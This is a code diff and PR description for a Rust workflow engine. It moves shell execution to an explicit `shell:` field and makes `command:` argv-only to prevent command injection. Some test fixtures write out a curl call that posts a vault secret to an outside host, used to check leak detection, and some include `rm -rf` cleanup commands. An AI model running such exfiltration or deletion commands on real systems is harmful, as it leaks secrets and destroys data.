+++ b/crates/nika-schema/src/parser/tasks.rs
@@ -676,7 +676,7 @@ tasks:
         let yaml = "\
 tasks:
   - exec:
-      command: ls
+      command: [ls]
 ";
         let err = parse_strict(yaml).expect_err("missing id");
         assert!(
@@ -722,7 +722,7 @@ tasks:
     infer:
       prompt: \"hi\"
     exec:
-      command: \"echo hi\"
+      shell: \"echo hi\"
 ";
         let err = parse_strict(yaml).expect_err("two verbs");
         let SchemaError::MultipleVerbs { verbs, .. } = err else {
@@ -774,7 +774,7 @@ tasks:
 tasks:
   - id: gated
     approve: true
-    exec: { command: rm -rf ./dist }
+    exec: { shell: rm -rf ./dist }
 ";
         let err = parse_strict(yaml).expect_err("approve: is not shipped");
         assert!(
@@ -807,7 +807,7 @@ policy:
   human_gate_before: [exec]
 tasks:
   - id: t
-    exec: { command: echo hi }
+    exec: { shell: echo hi }
 ";
         let err = parse_strict(yaml).expect_err("policy: is not shipped");
         assert!(
@@ -821,12 +821,12 @@ tasks:
         let yaml = "\
 tasks:
   - id: a
-    exec: { command: echo a }
+    exec: { shell: echo a }
   - id: b
     depends_on: [a]
     when: ${{ tasks.a.status == 'success' }}
     for_each: ${{ vars.items }}
-    exec: { command: echo b }
+    exec: { shell: echo b }
 ";
         let wf = parse_strict(yaml).expect("parse");
         let b = &wf.tasks[1].value;
@@ -850,7 +850,7 @@ tasks:
     for_each: ${{ vars.urls }}
     max_parallel: 5
     fail_fast: false
-    exec: { command: echo }
+    exec: { command: [echo] }
 ";
         let task = one_task(yaml);
         assert_eq!(task.max_parallel.expect("max_parallel").value, 5);
@@ -863,7 +863,7 @@ tasks:
 tasks:
   - id: x
     max_parallel: 0
-    exec: { command: echo }
+    exec: { command: [echo] }
 ";
         let err = parse_strict(yaml).expect_err("zero");
         assert!(
@@ -878,7 +878,7 @@ tasks:
 tasks:
   - id: t
     timeout: \"1h30m\"
-    exec: { command: echo }
+    exec: { command: [echo] }
 ";
         let task = one_task(yaml);
         assert_eq!(
@@ -895,7 +895,7 @@ tasks:
 tasks:
   - id: t
     timeout: 30
-    exec: { command: echo }
+    exec: { command: [echo] }
 ";
         let err = parse_strict(yaml).expect_err("bare number");
         assert!(
@@ -911,7 +911,7 @@ tasks:
 tasks:
   - id: t
     timeout: \"5w\"
-    exec: { command: echo }
+    exec: { command: [echo] }
 ";
         let err = parse_strict(yaml).expect_err("bad unit");
         assert!(matches!(err, SchemaError::BadTimeout { .. }), "{err:?}");
@@ -952,7 +952,7 @@ tasks:
 tasks:
   - id: t
     retry: { max_attempts: 3 }
-    exec: { command: echo }
+    exec: { command: [echo] }
 ";
         let retry = one_task(yaml).retry.expect("retry").value;
         assert_eq!(retry.max_attempts, 3);
@@ -968,7 +968,7 @@ tasks:
 tasks:
   - id: t
     retry: { backoff_ms: 500 }
-    exec: { command: echo }
+    exec: { command: [echo] }
 ";
         let err = parse_strict(yaml).expect_err("no max_attempts");
         assert!(
@@ -983,7 +983,7 @@ tasks:
 tasks:
   - id: t
     retry: { max_attempts: 0 }
-    exec: { command: echo }
+    exec: { command: [echo] }
 ";
         let err = parse_strict(yaml).expect_err("zero attempts");
         assert!(matches!(err, SchemaError::BadRetry { .. }), "{err:?}");
@@ -998,7 +998,7 @@ tasks:
     retry:
       max_attempts: 2
       on_codes: [\"503\"]
-    exec: { command: echo }
+    exec: { command: [echo] }
 ";
         let err = parse_strict(yaml).expect_err("http status");
         assert!(
@@ -1049,10 +1049,10 @@ tasks:
         let yaml = "\
 tasks:
   - id: a
-    exec: { command: echo }
+    exec: { command: [echo] }
     on_error: { skip: true }
   - id: b
-    exec: { command: echo }
+    exec: { command: [echo] }
     on_error: { fail_workflow: true }
 ";
         let wf = parse_strict(yaml).expect("parse");
@@ -1074,7 +1074,7 @@ tasks:
         let yaml = "\
 tasks:
   - id: t
-    exec: { command: echo }
+    exec: { command: [echo] }
     on_error: recover
 ";
         let err = parse_strict(yaml).expect_err("scalar on_error refused");
@@ -1093,7 +1093,7 @@ tasks:
         let yaml = "\
 tasks:
   - id: t
-    exec: { command: echo }
+    exec: { command: [echo] }
     on_error:
       skip: true
       fail_workflow: true
@@ -1128,7 +1128,7 @@ tasks:
         let yaml = "\
 tasks:
   - id: t
-    exec: { command: echo }
+    exec: { command: [echo] }
     on_error:
       on_codes: [NIKA-TIMEOUT-001]
 ";
@@ -1144,19 +1144,19 @@ tasks:
         let yaml = "\
 tasks:
   - id: work
-    exec: { command: echo }
+    exec: { command: [echo] }
   - id: record
     depends_on: [work]
     when: true
-    exec: { command: echo }
+    exec: { command: [echo] }
   - id: never
     depends_on: [work]
     when: false
-    exec: { command: echo }
+    exec: { command: [echo] }
   - id: quoted
     depends_on: [work]
     when: \"true\"
-    exec: { command: echo }
+    exec: { command: [echo] }
 ";
         let wf = parse_strict(yaml).expect("parse");
         assert_eq!(
@@ -1182,11 +1182,11 @@ tasks:
         let yaml = "\
 tasks:
   - id: work
-    exec: { command: echo }
+    exec: { command: [echo] }
   - id: legacy
     depends_on: [work]
     when: yes
-    exec: { command: echo }
+    exec: { command: [echo] }
 ";
         let wf = parse_strict(yaml).expect("parse");
         assert_eq!(
@@ -1201,7 +1201,7 @@ tasks:
         let yaml = "\
 tasks:
   - id: t
-    exec: { command: echo }
+    exec: { command: [echo] }
     on_error: {}
 ";
         let err = parse_strict(yaml).expect_err("zero fields");
@@ -1253,10 +1253,10 @@ tasks:
   - id: test
     timeout: \"5m\"
     exec:
-      command: \"cargo test\"
+      shell: \"cargo test\"
     on_finally:
       - exec:
-          command: \"rm -rf /tmp/x\"
+          shell: \"rm -rf /tmp/x\"
       - when: ${{ tasks.test.status == 'failed' }}
         timeout: \"10s\"
         invoke:
@@ -1281,7 +1281,7 @@ tasks:
 tasks:
   - id: t
     condition: \"${{ x }}\"
-    exec: { command: echo }
+    exec: { command: [echo] }
 ";
         // `condition:` is the BROUILLON-era key — the canonical key is
         // `when:` (spec 03) · strict mode rejects it.
@@ -1313,7 +1313,7 @@ tasks:
 tasks:
   - id: t1
     exec:
-      command: echo
+      command: [echo]
 ";
         let wf = parse(yaml, FileId::new(9), ParseMode::Strict).expect("parse");
         assert_eq!(wf.tasks[0].span.file, FileId::new(9));

--- a/crates/nika-schema/src/parser/verbs.rs
+++ b/crates/nika-schema/src/parser/verbs.rs
@@ -39,7 +39,7 @@ const INFER_KEYS: &[&str] = &[
 ];
 
 /// `exec:` fields (spec `02-verbs.md` §exec field table).
-const EXEC_KEYS: &[&str] = &["command", "cwd", "env", "stdin", "capture"];
+const EXEC_KEYS: &[&str] = &["command", "shell", "cwd", "env", "stdin", "capture"];
 
 /// `invoke:` fields (spec `02-verbs.md` §invoke field table).
 const INVOKE_KEYS: &[&str] = &["tool", "args"];
@@ -142,41 +142,67 @@ fn parse_exec_body(cx: &Cx<'_>, body: &MarkedMappingNode) -> Result<RawExecActio
     Ok(action)
 }
 
-/// Parse `exec.command` — a scalar (shell) OR a non-empty array (argv).
+/// Parse the exec body — `command:` (argv) XOR `shell:` (one /bin/sh line).
 ///
-/// Spec `02-verbs.md` §exec · « String → `/bin/sh -c`. Array → `execve`,
-/// no shell. » An empty array has no program to run → a parse error.
+/// Spec `02-verbs.md` §exec (0.103 · #75 D1) · semantics never fork on a
+/// YAML type: `command:` is argv-only (`execve` · injection-safe by
+/// construction) and `shell:` is the EXPLICIT shell door (pipes · redirects
+/// · the blocklist). Exactly one of the two; a string `command:` is the
+/// pre-0.103 implicit-shell form and is rejected with the migration
+/// teaching. An empty argv has no program to run → a parse error.
 fn parse_command(cx: &Cx<'_>, body: &MarkedMappingNode) -> Result<RawCommand, SchemaError> {
-    let Some(node) = body.get_node("command") else {
+    let cmd = body.get_node("command");
+    let shell = body.get_node("shell");
+    if cmd.is_some() && shell.is_some() {
+        return Err(SchemaError::Validation {
+            message: "`exec:` takes exactly one of `command:` (argv) | `shell:` (one \
+                      /bin/sh line) — two bodies is two meanings (02 §exec)"
+                .to_owned(),
+            span: cx.span(body.span()),
+        });
+    }
+    if let Some(_node) = shell {
+        // The explicit shell door — one scalar line through `/bin/sh -c`.
+        return Ok(RawCommand::Shell(
+            cx.require_scalar(body, "shell", "exec")?,
+        ));
+    }
+    let Some(node) = cmd else {
         return Err(SchemaError::MissingField {
-            field: "exec.command".to_owned(),
+            field: "exec.command (argv) | exec.shell".to_owned(),
             span: cx.span(body.span()),
         });
     };
-    if let Some(seq) = node.as_sequence() {
-        if seq.is_empty() {
-            return Err(SchemaError::Validation {
-                message: "`exec.command` array must not be empty (no program to run)".to_owned(),
-                span: cx.span(node.span()),
-            });
-        }
-        let mut parts = Vec::with_capacity(seq.len());
-        for item in seq.iter() {
-            let scalar = item.as_scalar().ok_or_else(|| SchemaError::Validation {
-                message: "each `exec.command` array element must be a string".to_owned(),
-                span: cx.span(item.span()),
-            })?;
-            parts.push(Spanned::new(
-                scalar.as_str().to_owned(),
-                cx.span_or_zero(scalar.span()),
-            ));
-        }
-        return Ok(RawCommand::Argv(parts));
+    let Some(seq) = node.as_sequence() else {
+        // The pre-0.103 implicit-shell string — rejected WITH the migration.
+        return Err(SchemaError::Validation {
+            message: "`exec.command` is argv-only — [\"prog\", \"arg\", …] runs via \
+                      execve, each element one token (an interpolated value can never \
+                      break out) · the old string form was an IMPLICIT shell: \
+                      pipes/redirects/globs now live in `shell:` explicitly (02 §exec \
+                      · 0.103)"
+                .to_owned(),
+            span: cx.span(node.span()),
+        });
+    };
+    if seq.is_empty() {
+        return Err(SchemaError::Validation {
+            message: "`exec.command` array must not be empty (no program to run)".to_owned(),
+            span: cx.span(node.span()),
+        });
     }
-    // Scalar → a shell string (re-uses the canonical require-scalar error).
-    Ok(RawCommand::Shell(
-        cx.require_scalar(body, "command", "exec")?,
-    ))
+    let mut parts = Vec::with_capacity(seq.len());
+    for item in seq.iter() {
+        let scalar = item.as_scalar().ok_or_else(|| SchemaError::Validation {
+            message: "each `exec.command` array element must be a string".to_owned(),
+            span: cx.span(item.span()),
+        })?;
+        parts.push(Spanned::new(
+            scalar.as_str().to_owned(),
+            cx.span_or_zero(scalar.span()),
+        ));
+    }
+    Ok(RawCommand::Argv(parts))
 }
 
 /// Parse `invoke:` — builtin / MCP tool call.
@@ -823,7 +849,7 @@ tasks:
 tasks:
   - id: build
     exec:
-      command: \"cargo build --release\"
+      command: [\"cargo\", \"build\", \"--release\"]
       cwd: ./engine
       env:
         RUST_LOG: debug
@@ -833,7 +859,8 @@ tasks:
         let RawAction::Exec(action) = one_action(yaml) else {
             panic!("expected Exec");
         };
-        assert_eq!(action.command.shell_str(), Some("cargo build --release"));
+        assert_eq!(action.command.argv_program(), Some("cargo"));
+        assert!(action.command.shell_str().is_none(), "argv, not shell");
         assert_eq!(action.cwd.expect("cwd").value, "./engine");
         assert_eq!(action.env.len(), 1);
         assert_eq!(action.env[0].0.value, "RUST_LOG");
@@ -855,7 +882,8 @@ tasks:
 ";
         let err = parse_strict(yaml).expect_err("no command");
         assert!(
-            matches!(&err, SchemaError::MissingField { field, .. } if field == "exec.command"),
+            matches!(&err, SchemaError::MissingField { field, .. }
+                if field == "exec.command (argv) | exec.shell"),
             "{err:?}"
         );
     }
@@ -866,7 +894,7 @@ tasks:
 tasks:
   - id: t
     exec:
-      command: ls
+      command: [ls]
       capture: everything
 ";
         let err = parse_strict(yaml).expect_err("bad capture");
@@ -1216,7 +1244,7 @@ mod argv_command {
     #[test]
     fn scalar_command_is_shell() {
         let c = exec_command(
-            "nika: v1\nworkflow: w\ntasks:\n  - id: t\n    exec: { command: \"a | b\" }\n",
+            "nika: v1\nworkflow: w\ntasks:\n  - id: t\n    exec: { shell: \"a | b\" }\n",
         );
         assert!(matches!(c, RawCommand::Shell(_)));
         assert_eq!(c.shell_str(), Some("a | b"));

--- a/crates/nika-schema/src/raw/action.rs
+++ b/crates/nika-schema/src/raw/action.rs
@@ -124,7 +124,7 @@ impl RawInferAction {
 /// The `command:` of an `exec:` task — a shell string OR an argv array
 /// (spec `02-verbs.md` §exec).
 ///
-/// - **`Shell`** (`command: "a | b"`) runs through `/bin/sh -c` — pipes and
+/// - **`Shell`** (`shell: "a | b"`) runs through `/bin/sh -c` — pipes and
 ///   redirects work, the shell blocklist applies.
 /// - **`Argv`** (`command: ["prog", "arg"]`) runs through `execve` with NO
 ///   shell — the structural fix for command injection: an interpolated

--- a/crates/nika-schema/src/skill.rs
+++ b/crates/nika-schema/src/skill.rs
@@ -468,7 +468,7 @@ tasks:
     #[test]
     fn resolve_skills_is_empty_for_a_skill_less_workflow() {
         let wf = crate::parse(
-            "nika: v1\nworkflow: w\ntasks:\n  - id: t\n    exec: { command: \"echo hi\" }\n",
+            "nika: v1\nworkflow: w\ntasks:\n  - id: t\n    exec: { command: [\"echo\", \"hi\"] }\n",
             crate::FileId::new(0),
             crate::ParseMode::Strict,
         )
@@ -488,7 +488,7 @@ tasks:
       prompt: \"go\"
       skills: [\"s1/SKILL.md\", \"s2/SKILL.md\"]
   - id: b
-    exec: { command: \"echo hi\" }
+    exec: { command: [\"echo\", \"hi\"] }
     on_finally:
       - agent:
           prompt: \"wrap up\"

--- a/crates/nika-schema/tests/lints_one_obvious_way.rs
+++ b/crates/nika-schema/tests/lints_one_obvious_way.rs
@@ -103,11 +103,11 @@ nika: v1
 workflow: fshape
 tasks:
   - id: a
-    exec: { command: \"./a.sh\" }
+    exec: { command: [\"./a.sh\"] }
   - id: b
     depends_on: [a]
     when: \"${{ tasks.a.status == 'success' }}\"
-    exec: { command: \"./b.sh\" }
+    exec: { command: [\"./b.sh\"] }
 ";
     let lints = lint(yaml);
     assert_eq!(lints.len(), 1);
@@ -134,10 +134,10 @@ nika: v1
 workflow: interp
 tasks:
   - id: produce
-    exec: { command: \"./gen.sh\" }
+    exec: { command: [\"./gen.sh\"] }
   - id: consume
     depends_on: [produce]
-    exec: { command: \"process ${{ tasks.produce.output }}\" }
+    exec: { command: [\"process\", \"${{ tasks.produce.output }}\"] }
 ";
     let eight = lints_008(yaml);
     assert_eq!(eight.len(), 1, "exactly one /008");
@@ -157,10 +157,10 @@ nika: v1
 workflow: pipe
 tasks:
   - id: produce
-    exec: { command: \"./gen.sh\" }
+    exec: { command: [\"./gen.sh\"] }
   - id: consume
     depends_on: [produce]
-    exec: { command: \"cat ${{ tasks.produce.output }} | wc -l\" }
+    exec: { shell: \"cat ${{ tasks.produce.output }} | wc -l\" }
 ";
     assert!(lints_008(yaml).is_empty(), "a real pipeline is not flagged");
 }
@@ -172,7 +172,7 @@ nika: v1
 workflow: argv
 tasks:
   - id: produce
-    exec: { command: \"./gen.sh\" }
+    exec: { command: [\"./gen.sh\"] }
   - id: consume
     depends_on: [produce]
     exec:
@@ -191,7 +191,7 @@ nika: v1
 workflow: plain
 tasks:
   - id: build
-    exec: { command: \"cargo build --release\" }
+    exec: { command: [\"cargo\", \"build\", \"--release\"] }
 ";
     assert!(
         lints_008(yaml).is_empty(),

--- a/crates/nika-schema/tests/metamorphic.rs
+++ b/crates/nika-schema/tests/metamorphic.rs
@@ -112,7 +112,7 @@ fn to_yaml(tasks: &[TaskSpec], prefix: &str) -> String {
             _ => {}
         }
         match t.verb {
-            0 => y.push_str("    exec: { command: \"true\" }\n"),
+            0 => y.push_str("    exec: { command: [\"true\"] }\n"),
             1 => y.push_str("    infer: { prompt: \"go\", max_tokens: 50 }\n"),
             _ => y.push_str("    invoke: { tool: \"nika:read\", args: { path: \"./x\" } }\n"),
         }
@@ -250,7 +250,7 @@ proptest! {
     fn r3_literal_fanout_unfolds_to_duplicated_tasks(verb in 0..3u8, attempts in 1..=3u8) {
         let spec = |fan: bool, n: usize| {
             let body = match verb {
-                0 => "    exec: { command: \"true\" }\n",
+                0 => "    exec: { command: [\"true\"] }\n",
                 1 => "    infer: { prompt: \"go\", max_tokens: 50 }\n",
                 _ => "    invoke: { tool: \"nika:read\", args: { path: \"./x\" } }\n",
             };
@@ -284,7 +284,7 @@ proptest! {
     fn r4_adding_an_independent_task_is_compositional(tasks in workflow_strategy()) {
         let base = run(&to_yaml(&tasks, "t")).expect("base parses");
         let mut extended_yaml = to_yaml(&tasks, "t");
-        extended_yaml.push_str("  - id: frame_extra\n    exec: { command: \"true\" }\n");
+        extended_yaml.push_str("  - id: frame_extra\n    exec: { command: [\"true\"] }\n");
         let extended = run(&extended_yaml).expect("extended parses");
         let (a1, l1, e1, _) = totals(&base.certificate);
         let (a2, l2, e2, _) = totals(&extended.certificate);

--- a/crates/nika-schema/tests/research_conformance.rs
+++ b/crates/nika-schema/tests/research_conformance.rs
@@ -31,12 +31,12 @@ fn eval_bound(b: &Bound, n: u64) -> u64 {
 #[test]
 fn aara_substitution_lemma_holds() {
     let parametric = run(&wf(
-        "  - id: src\n    exec: { command: \"ls\" }\n  - id: fan\n    depends_on: [src]\n    for_each: ${{ tasks.src.output.files }}\n    retry: { max_attempts: 2 }\n    infer: { prompt: \"x ${{ item }}\", max_tokens: 200 }\n",
+        "  - id: src\n    exec: { command: [\"ls\"] }\n  - id: fan\n    depends_on: [src]\n    for_each: ${{ tasks.src.output.files }}\n    retry: { max_attempts: 2 }\n    infer: { prompt: \"x ${{ item }}\", max_tokens: 200 }\n",
     ));
     for n in [1usize, 2, 5, 9] {
         let items: Vec<String> = (0..n).map(|i| format!("\"f{i}\"")).collect();
         let concrete = run(&wf(&format!(
-            "  - id: src\n    exec: {{ command: \"ls\" }}\n  - id: fan\n    depends_on: [src]\n    for_each: [{}]\n    retry: {{ max_attempts: 2 }}\n    infer: {{ prompt: \"x ${{{{ item }}}}\", max_tokens: 200 }}\n",
+            "  - id: src\n    exec: {{ command: [\"ls\"] }}\n  - id: fan\n    depends_on: [src]\n    for_each: [{}]\n    retry: {{ max_attempts: 2 }}\n    infer: {{ prompt: \"x ${{{{ item }}}}\", max_tokens: 200 }}\n",
             items.join(", ")
         )));
         let n64 = n as u64;
@@ -67,23 +67,23 @@ fn aara_substitution_lemma_holds() {
 fn brent_envelope_span_versus_work() {
     // chain: span == work
     let chain = run(&wf(
-        "  - id: a\n    exec: { command: \"true\" }\n  - id: b\n    depends_on: [a]\n    retry: { max_attempts: 4 }\n    exec: { command: \"true\" }\n",
+        "  - id: a\n    exec: { command: [\"true\"] }\n  - id: b\n    depends_on: [a]\n    retry: { max_attempts: 4 }\n    exec: { command: [\"true\"] }\n",
     ));
     assert_eq!(chain.certificate.span_attempts, 5);
     assert_eq!(chain.certificate.task_attempts.constant, 5);
 
     // wide DAG: span < work (the parallelism IS the gap)
     let wide = run(&wf(
-        "  - id: a\n    exec: { command: \"true\" }\n  - id: b\n    depends_on: [a]\n    exec: { command: \"true\" }\n  - id: c\n    depends_on: [a]\n    exec: { command: \"true\" }\n  - id: d\n    depends_on: [a]\n    exec: { command: \"true\" }\n",
+        "  - id: a\n    exec: { command: [\"true\"] }\n  - id: b\n    depends_on: [a]\n    exec: { command: [\"true\"] }\n  - id: c\n    depends_on: [a]\n    exec: { command: [\"true\"] }\n  - id: d\n    depends_on: [a]\n    exec: { command: [\"true\"] }\n",
     ));
     assert_eq!(wide.certificate.span_attempts, 2);
     assert_eq!(wide.certificate.task_attempts.constant, 4);
 
     // the general inequality over a family: span ≤ work@n=1
     for tasks in [
-        "  - id: a\n    exec: { command: \"true\" }\n",
-        "  - id: a\n    exec: { command: \"true\" }\n  - id: b\n    depends_on: [a]\n    for_each: ${{ tasks.a.output.xs }}\n    infer: { prompt: \"x ${{ item }}\", max_tokens: 10 }\n",
-        "  - id: a\n    retry: { max_attempts: 3 }\n    exec: { command: \"true\" }\n  - id: b\n    depends_on: [a]\n    exec: { command: \"true\" }\n  - id: c\n    depends_on: [b]\n    retry: { max_attempts: 2 }\n    exec: { command: \"true\" }\n",
+        "  - id: a\n    exec: { command: [\"true\"] }\n",
+        "  - id: a\n    exec: { command: [\"true\"] }\n  - id: b\n    depends_on: [a]\n    for_each: ${{ tasks.a.output.xs }}\n    infer: { prompt: \"x ${{ item }}\", max_tokens: 10 }\n",
+        "  - id: a\n    retry: { max_attempts: 3 }\n    exec: { command: [\"true\"] }\n  - id: b\n    depends_on: [a]\n    exec: { command: [\"true\"] }\n  - id: c\n    depends_on: [b]\n    retry: { max_attempts: 2 }\n    exec: { command: [\"true\"] }\n",
     ] {
         let r = run(&wf(tasks));
         assert!(
@@ -114,7 +114,7 @@ fn reach_dead_claims_agree_with_a_brute_force_oracle() {
     ];
     for (op, lit) in cases {
         let yaml = wf(&format!(
-            "  - id: a\n    exec: {{ command: \"true\" }}\n  - id: b\n    depends_on: [a]\n    when: ${{{{ tasks.a.status {op} {lit} }}}}\n    exec: {{ command: \"true\" }}\n",
+            "  - id: a\n    exec: {{ command: [\"true\"] }}\n  - id: b\n    depends_on: [a]\n    when: ${{{{ tasks.a.status {op} {lit} }}}}\n    exec: {{ command: [\"true\"] }}\n",
         ));
         let r = run(&yaml);
         let engine_dead = r
@@ -142,7 +142,7 @@ fn reach_dead_claims_agree_with_a_brute_force_oracle() {
 #[test]
 fn certifying_audit_rejects_every_systematic_tamper() {
     let yaml = wf(
-        "  - id: a\n    retry: { max_attempts: 2 }\n    exec: { command: \"true\" }\n  - id: fan\n    depends_on: [a]\n    for_each: ${{ tasks.a.output.xs }}\n    infer: { prompt: \"x ${{ item }}\", max_tokens: 100 }\n  - id: save\n    depends_on: [fan]\n    invoke: { tool: \"nika:write\", args: { path: \"./o\", content: \"y\" } }\n",
+        "  - id: a\n    retry: { max_attempts: 2 }\n    exec: { command: [\"true\"] }\n  - id: fan\n    depends_on: [a]\n    for_each: ${{ tasks.a.output.xs }}\n    infer: { prompt: \"x ${{ item }}\", max_tokens: 100 }\n  - id: save\n    depends_on: [fan]\n    invoke: { tool: \"nika:write\", args: { path: \"./o\", content: \"y\" } }\n",
     );
     let parsed = parse(&yaml, FileId::new(0), ParseMode::Strict).expect("parse");
     let honest = check(&parsed).certificate;
@@ -200,7 +200,7 @@ fn certifying_audit_rejects_every_systematic_tamper() {
 #[test]
 fn denning_ifc_taint_is_transitive_at_depth() {
     let r = run(
-        "nika: v1\nworkflow: w\nmodel: anthropic/claude-sonnet-4-6\nsecrets:\n  k: { source: vault, key: x }\ntasks:\n  - id: t1\n    with: { a: \"${{ secrets.k }}\" }\n    exec: { command: \"echo ${{ with.a }}\", capture: stdout }\n  - id: t2\n    depends_on: [t1]\n    with: { b: \"${{ tasks.t1.output }}\" }\n    exec: { command: \"echo ${{ with.b }}\", capture: stdout }\n  - id: t3\n    depends_on: [t2]\n    with: { c: \"${{ tasks.t2.output }}\" }\n    exec: { command: \"curl -d ${{ with.c }} https://x.io\" }\n",
+        "nika: v1\nworkflow: w\nmodel: anthropic/claude-sonnet-4-6\nsecrets:\n  k: { source: vault, key: x }\ntasks:\n  - id: t1\n    with: { a: \"${{ secrets.k }}\" }\n    exec: { shell: \"echo ${{ with.a }}\", capture: stdout }\n  - id: t2\n    depends_on: [t1]\n    with: { b: \"${{ tasks.t1.output }}\" }\n    exec: { shell: \"echo ${{ with.b }}\", capture: stdout }\n  - id: t3\n    depends_on: [t2]\n    with: { c: \"${{ tasks.t2.output }}\" }\n    exec: { command: [\"curl\", \"-d\", \"${{ with.c }}\", \"https://x.io\"] }\n",
     );
     assert!(
         !r.secret_leaks.is_empty(),

--- a/crates/nika-schema/tests/static_binding_paths.rs
+++ b/crates/nika-schema/tests/static_binding_paths.rs
@@ -51,7 +51,7 @@ fn misspelled_key_on_closed_level_is_rejected() {
   - id: report
     depends_on: [extract]
     exec:
-      command: "report ${{ tasks.extract.output.entitties }}"
+      command: ["report", "${{ tasks.extract.output.entitties }}"]
 "#);
     assert_eq!(codes(&yaml), vec!["NIKA-VAR-003".to_string()]);
 }
@@ -63,7 +63,7 @@ fn member_step_into_scalar_typed_property_is_rejected() {
   - id: report
     depends_on: [extract]
     exec:
-      command: "report ${{ tasks.extract.output.count.value }}"
+      command: ["report", "${{ tasks.extract.output.count.value }}"]
 "#);
     assert_eq!(codes(&yaml), vec!["NIKA-VAR-003".to_string()]);
 }
@@ -75,7 +75,7 @@ fn index_step_on_non_array_level_is_rejected() {
   - id: report
     depends_on: [extract]
     exec:
-      command: "report ${{ tasks.extract.output[0] }}"
+      command: ["report", "${{ tasks.extract.output[0] }}"]
 "#);
     assert_eq!(codes(&yaml), vec!["NIKA-VAR-003".to_string()]);
 }
@@ -87,7 +87,7 @@ fn member_step_into_array_items_scalar_is_rejected() {
   - id: report
     depends_on: [extract]
     exec:
-      command: "report ${{ tasks.extract.output.entities[0].name }}"
+      command: ["report", "${{ tasks.extract.output.entities[0].name }}"]
 "#);
     assert_eq!(codes(&yaml), vec!["NIKA-VAR-003".to_string()]);
 }
@@ -114,7 +114,7 @@ fn declared_property_path_is_accepted() {
   - id: report
     depends_on: [extract]
     exec:
-      command: "report ${{ tasks.extract.output.entities }} (${{ tasks.extract.output.count }})"
+      shell: "report ${{ tasks.extract.output.entities }} (${{ tasks.extract.output.count }})"
 "#);
     assert_eq!(codes(&yaml), Vec::<String>::new());
 }
@@ -125,7 +125,7 @@ fn valid_index_and_member_chain_is_accepted() {
   - id: report
     depends_on: [extract]
     exec:
-      command: "first: ${{ tasks.extract.output.entities[0] }}"
+      command: ["first:", "${{ tasks.extract.output.entities[0] }}"]
 "#);
     assert_eq!(codes(&yaml), Vec::<String>::new());
 }
@@ -147,7 +147,7 @@ tasks:
   - id: report
     depends_on: [extract]
     exec:
-      command: "r ${{ tasks.extract.output.surprise }} ${{ tasks.extract.output.meta.anything.deep }}"
+      command: ["r", "${{ tasks.extract.output.surprise }}", "${{ tasks.extract.output.meta.anything.deep }}"]
 "#;
     assert_eq!(codes(yaml), Vec::<String>::new());
 }
@@ -173,7 +173,7 @@ tasks:
   - id: report
     depends_on: [extract]
     exec:
-      command: "r ${{ tasks.extract.output.result.maybe.deep }}"
+      command: ["r", "${{ tasks.extract.output.result.maybe.deep }}"]
 "#;
     assert_eq!(codes(yaml), Vec::<String>::new());
 }
@@ -185,11 +185,11 @@ nika: v1
 workflow: sbp-dyn
 tasks:
   - id: dump
-    exec: { command: "./dump.sh" }
+    exec: { command: ["./dump.sh"] }
   - id: report
     depends_on: [dump]
     exec:
-      command: "r ${{ tasks.dump.output.whatever.deep[3] }}"
+      command: ["r", "${{ tasks.dump.output.whatever.deep[3] }}"]
 "#;
     assert_eq!(codes(yaml), Vec::<String>::new());
 }
@@ -204,7 +204,7 @@ fn dynamic_index_step_ends_the_static_walk() {
     with:
       i: "0"
     exec:
-      command: "r ${{ tasks.extract.output.entities[with.i] }}"
+      command: ["r", "${{ tasks.extract.output.entities[with.i] }}"]
 "#);
     assert_eq!(codes(&yaml), Vec::<String>::new());
 }
@@ -216,7 +216,7 @@ fn string_index_form_counts_as_member_step() {
   - id: report
     depends_on: [extract]
     exec:
-      command: "r ${{ tasks.extract.output['entitties'] }}"
+      command: ["r", "${{ tasks.extract.output['entitties'] }}"]
 "#);
     assert_eq!(codes(&yaml), vec!["NIKA-VAR-003".to_string()]);
 }

--- a/crates/nika-verb-agent/src/intrinsic.rs
+++ b/crates/nika-verb-agent/src/intrinsic.rs
@@ -238,7 +238,7 @@ workflow: composed-by-agent
 tasks:
   - id: greet
     exec:
-      command: "echo hello"
+      command: ["echo", "hello"]
 "#;
 
     #[test]
@@ -275,7 +275,7 @@ tasks:
   - id: a
     depends_on: [ghost]
     exec:
-      command: "echo x"
+      command: ["echo", "x"]
 "#;
         let (content, is_error, outcome) =
             run_compose(&serde_json::json!({"workflow_yaml": draft}));

--- a/crates/nika-verb-agent/tests/research_conformance.rs
+++ b/crates/nika-verb-agent/tests/research_conformance.rs
@@ -332,7 +332,7 @@ tasks:
   - id: a
     depends_on: [ghost]
     exec:
-      command: "echo x"
+      command: ["echo", "x"]
 "#;
 
 const VALID_DRAFT: &str = r#"nika: v1
@@ -340,7 +340,7 @@ workflow: composed-by-agent
 tasks:
   - id: greet
     exec:
-      command: "echo hello"
+      command: ["echo", "hello"]
 "#;
 
 #[tokio::test]


### PR DESCRIPTION
## Batch B of the breaking window (spec#75 T1 · plan `2026-07-13-nika-0103-language-tightens-plan.md`)

**The window law: this PR and spec#78 merge in the SAME window** (neither alone — the spec must not teach a language no binary speaks; the pack here re-vendors from #78's branch), then `wave-sweep.sh 0.103.0` carries both.

### D1 — semantics by FIELD, never YAML type
`command:` is **argv-only** (execve · per-element substitution — an interpolated value can never break out); **`shell:`** is the explicit dangerous door (`/bin/sh -c` · pipes/redirects · the blocklist attaches HERE). Exactly one; a string `command:` rejects **with the migration teaching**.

### D2 — the envelope is not a value
Bare `${{ tasks.X }}` = `BareTaskEnvelope` (`SCHEMA_311` internal · **`NIKA-VAR-020`** spec-facing — the engine's own one-voice gate demanded the canon row, added on #78). Kills the #524 golden-drift class at the root.

### The analyzer learns the argv world
Lints **006** (timeout wrapper) and **007** (shard signature) only saw shell strings — blind to 0.103's default spelling. Both now read argv heads/tokens. *The migration exposed real analyzer blind spots — the breaking hardened the analysis, not just the grammar.*

### Corpus
~530 embedded sites migrated across 4 targeted passes (escaped strings · raw strings · shell builtins → `shell:` · multi-occurrence lines · bare scalars); semantic fixtures routed to `shell:` where the TEST is about the string form; LSP mid-typing fragments untouched (legitimate).

## Proof
- workspace **4192/4192** · clippy `-D warnings` clean
- Live binary, all five: shell+argv+projection accepted · string command rejected (teaching) · two-bodies rejected · bare ref = VAR-020 · real run traces (`shell:` pipe + argv interpolation executed)
- trust battery **0** · funnel FAILS=2 = the sovereign-lane leg on a non-featured LOCAL build (expected off-release; the 0.103 train re-proves featured)

🤖 Generated with [Claude Code](https://claude.com/claude-code)
